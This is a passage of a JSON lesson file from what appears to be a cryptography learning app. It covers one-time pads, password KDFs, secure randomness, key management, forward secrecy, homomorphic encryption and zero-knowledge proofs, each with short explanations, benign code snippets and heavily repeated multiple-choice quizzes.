proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-otp","cat":"Cryptography","title":"One-Time Pad","diff":1,"xp":75,"intro":"The only theoretically unbreakable cipher.","sections":[{"type":"text","content":"The only theoretically unbreakable cipher."},{"type":"code","lang":"bash","content":"# OTP: XOR plaintext with random key of same length\n# Conditions: key must be truly random, same length, never reused\n# Impractical: key distribution is the problem\npython3 -c 'import os; msg=b\"hello\"; key=os.urandom(len(msg)); cipher=bytes(a^b for a,b in zip(msg,key)); print(cipher.hex())'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"One-time pad is unbreakable when...","opts":["The key is short","The key is truly random, as long as the message, and never reused","It uses AES","It's encrypted twice"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-kdf-comparison","cat":"Cryptography","title":"KDF Comparison: PBKDF2 vs scrypt vs Argon2","diff":3,"xp":200,"intro":"Choose the right password hashing algorithm.","sections":[{"type":"text","content":"Choose the right password hashing algorithm."},{"type":"code","lang":"bash","content":"# PBKDF2: CPU-hard only (weakest against GPU)\n# scrypt: memory-hard (better against GPU)\n# Argon2id: time + memory hard (best, OWASP recommended)\n# For new projects: use Argon2id"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"The strongest password hash is...","opts":["MD5","Argon2id (time + memory hard)","SHA-256","bcrypt"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-rng","cat":"Cryptography","title":"Random Number Generation","diff":2,"xp":150,"intro":"Cryptographic randomness vs pseudo-randomness.","sections":[{"type":"text","content":"Cryptographic randomness vs pseudo-randomness."},{"type":"code","lang":"bash","content":"# PRNG: deterministic, seeded (Mersenne Twister \u2014 NOT for crypto)\n# CSPRNG: unpredictable (os.urandom, /dev/urandom)\npython3 -c 'import os; print(os.urandom(32).hex())'  # secure\npython3 -c 'import random; print(random.getrandbits(256))'  # NOT secure"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"For cryptography, use...","opts":["random.random()","os.urandom() / CSPRNG","Math.random()","time-based seed"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-key-management","cat":"Cryptography","title":"Key Management Best Practices","diff":3,"xp":200,"intro":"Generate, store, rotate, and destroy keys securely.","sections":[{"type":"text","content":"Generate, store, rotate, and destroy keys securely."},{"type":"code","lang":"bash","content":"# Key lifecycle:\n# 1. Generate: use CSPRNG, appropriate key length\n# 2. Store: HSM, key vault, never in code\n# 3. Distribute: encrypted channel, key wrapping\n# 4. Rotate: regularly, on compromise\n# 5. Destroy: secure deletion, multiple overwrites"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Keys should be stored in...","opts":["Source code","HSMs or dedicated key vaults","Environment variables","Text files"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-forward-secrecy","cat":"Cryptography","title":"Perfect Forward Secrecy","diff":3,"xp":200,"intro":"Ephemeral keys protect past communications.","sections":[{"type":"text","content":"Ephemeral keys protect past communications."},{"type":"code","lang":"bash","content":"# PFS: each session uses a new keypair\n# Even if long-term key is compromised later, past sessions stay safe\n# TLS 1.3 REQUIRES forward secrecy\n# Cipher suites with DHE or ECDHE provide PFS"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Forward secrecy means...","opts":["Faster encryption","Past sessions stay safe even if the long-term key is compromised later","Stronger passwords","Better compression"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-homomorphic","cat":"Cryptography","title":"Homomorphic Encryption","diff":4,"xp":250,"intro":"Compute on encrypted data without decrypting.","sections":[{"type":"text","content":"Compute on encrypted data without decrypting."},{"type":"code","lang":"bash","content":"# FHE: add and multiply ciphertexts\n# Result when decrypted = operation on plaintexts\n# Libraries: Microsoft SEAL, TFHE, OpenFHE\n# Use case: privacy-preserving cloud computation"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Homomorphic encryption allows...","opts":["Faster decryption","Computing on encrypted data without access to plaintext","Shorter keys","Password recovery"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-zkp","cat":"Cryptography","title":"Zero Knowledge Proofs","diff":4,"xp":250,"intro":"Prove a statement without revealing the underlying secret.","sections":[{"type":"text","content":"Prove a statement without revealing the underlying secret."},{"type":"code","lang":"bash","content":"# ZKP: prove you know something without revealing it\n# zk-SNARKs: used in Zcash, Ethereum\n# zk-STARKs: quantum-resistant\n# Use cases: authentication, blockchain privacy"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"In a ZKP, the verifier learns...","opts":["The secret","Nothing except that the statement is true","Half the secret","The proof method"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-mpc","cat":"Cryptography","title":"Multi-Party Computation","diff":5,"xp":300,"intro":"Multiple parties compute a function without revealing their inputs.","sections":[{"type":"text","content":"Multiple parties compute a function without revealing their inputs."},{"type":"code","lang":"bash","content":"# MPC: parties jointly compute f(x1,x2,...) without revealing xi\n# Use cases: private auctions, 